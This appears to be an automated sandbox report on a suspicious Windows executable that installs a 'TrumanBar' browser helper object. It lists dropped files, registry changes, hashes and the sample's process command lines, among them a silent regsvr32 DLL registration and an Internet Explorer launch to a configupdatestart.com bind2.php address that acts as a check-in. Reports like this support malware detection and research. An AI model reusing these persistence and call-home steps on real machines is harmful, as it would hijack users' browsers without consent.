Analysis Overview
SHA256
c18f66b20db148aff2ff1bc3e2b6634cc8f6f6ed6842fa17839ef435a4ec3d84
Threat Level: Shows suspicious behavior
The file 8ffcef8076920d374af454c1f3b406f9 was found to be: Shows suspicious behavior.
Malicious Activity Summary
UPX packed file
Checks computer location settings
Loads dropped DLL
Installs/modifies Browser Helper Object
Drops file in System32 directory
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-04 19:42
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-04 19:42
Reported
2024-02-04 19:44
Platform
win7-20231215-en
Max time kernel
122s
Max time network
127s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{BDF6E57E-7330-40CB-8363-D82E9BFF223B} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\eyfwin.dll | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\p.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\sf.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\c.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\m.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\m3.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\s.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\ios.dat | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000566b58630fb3a044b91770fce5e9b2d600000000020000000000106600000001000020000000cf8ac6bc8fa8769604a63ebe93d6118200f697d4b613160c3d89bf1d1645b0c5000000000e800000000200002000000002a985d210547b2a299733e6bd4d08a2e578b4e2741ce20bb519731f5dc4bf4e200000008d1d100079a736e85dd4272e362e24dfdb04ce326048c97092602d77823562ef40000000f0001a849e51b4be2201e502c56ab5160e1c93795a8c443e8b8bd10baa13cc8a6749e9b917dca9f4b1236977c4879d7396b00234a674747928efc5e07fd69182 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90c0c14ea257da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7A4C9A01-C395-11EE-A5E0-76D8C56D161B} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000566b58630fb3a044b91770fce5e9b2d60000000002000000000010660000000100002000000066013b92cb645b8e58d970bfbda7db65bd4965b830ca5defbbd76f84e188c54c000000000e8000000002000020000000947229e943070f9016e9c5493de4034abc415b6f5b939427438a84e91bf6812690000000f6a7ff823b063452d904926e686099c8917569f62e66faffad948de214f51216d388f2de4ca2a586317d82de2a0e582fb29dca93c8cc1d9a2e575a12b5afd1dd9366e6e81a21d016dad8f53cde30e46caf02f38907ae5269444a8fbc5c96280122edcffde3f27839271d07af015ccf2582a82ba26b19fad9e3a2401e17dbb1199fb91624b739333b7b7c61dd78ac60f240000000840e64bc4167196f79b5e448b4fb28ca82b422956db00ef3617cbf2038d1b37b741e553b8fc769152a03c65038f87b7ebdd454a918192061aa4684e6626e5e48 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "413237593" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ = "_Iffgd3cEvents" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32\ = "C:\\Windows\\SysWow64\\eyfwin.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\ = "TrumanBar" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ = "TrumanBar" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ = "_Iffgd3cEvents" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CurVer\ = "Ho4ydomoj.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\CLSID\ = "{BDF6E57E-7330-40CB-8363-D82E9BFF223B}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\Programmable | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CLSID\ = "{BDF6E57E-7330-40CB-8363-D82E9BFF223B}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\ = "ddf457 Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ = "Iffgd3c" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ = "Iffgd3c" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR\ = "C:\\Windows\\SysWow64\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\ = "TrumanBar" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ProgID\ = "Ho4ydomoj.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\VersionIndependentProgID\ = "Ho4ydomoj" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32\ = "C:\\Windows\\SysWow64\\eyfwin.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe
"C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s C:\Windows\system32\eyfwin.dll
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://configupdatestart.com/bind2.php?id=3913842
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2780 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | configupdatestart.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/2372-0-0x0000000000400000-0x0000000000470000-memory.dmp
C:\Windows\SysWOW64\eyfwin.dll
| MD5 | 732cadeaf934ac1edc47f1a577eca711 |
| SHA1 | 444f18e24d9c48e99b142c85ba6e65cba693988f |
| SHA256 | e232ef1159527f8ef57f480dcf0399d9b718354e90449545b1a3b7ea30015871 |
| SHA512 | 9b8a8e36b8e7292915a99a47796cd89dab6af4a506bf956093cbcefc24a4b7d3864f26c50d4b4326c38d03a8aca8c4be822e1702b436e9a97b1e084c6e9c0e5f |
memory/2372-29-0x0000000000400000-0x0000000000470000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab320B.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar328B.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 94948acb994187ba726976dbc15668d1 |
| SHA1 | d2f4cd38a7fdc8f60d6996c1852d436e9a09cea3 |
| SHA256 | b30927ca399098e196bb7783fcff5731e799647189c97a9aa821f6e52ee0dfec |
| SHA512 | 1bc78a410bfe0674b1400adacea3ea8e30e4395ada83d4d0d6c6d11fb90b980b79cbfbec0af033475ddf2f1423309e589e6b55ce82775bae88874177acb91ec4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 30e4cdc2d137eebcae046057c2733c9b |
| SHA1 | 600cff8ea458649196055d8cb410b010b8948f27 |
| SHA256 | 0294f464c7aa4b5a882515a9922f7f836d407c809a261743f85fdb319cb0cb82 |
| SHA512 | abf1ec370543e9b149a25d567a42b60cbd982f5392b7b8f0a102852ea75c297dcb9528ec90fe9d206b2e090719d0c0bbf036dc60826cfe4a5d264df879fec768 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e459c8be50281da4046a613507d365a6 |
| SHA1 | 9eac1bf278cb9a6ee5ee9450af3aa56a13973fbd |
| SHA256 | 9c9b3993c57f2710594712029d10adb8b3f5a8208a1824f937734cf67f341f63 |
| SHA512 | 7927966bee9705450ca5ccadb91117beb5458e210ae832a29c7a90cef40b6cf5881ee76d494507b9e00d640f189bf3efc18c7a697e328798d05e69f124c8c414 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
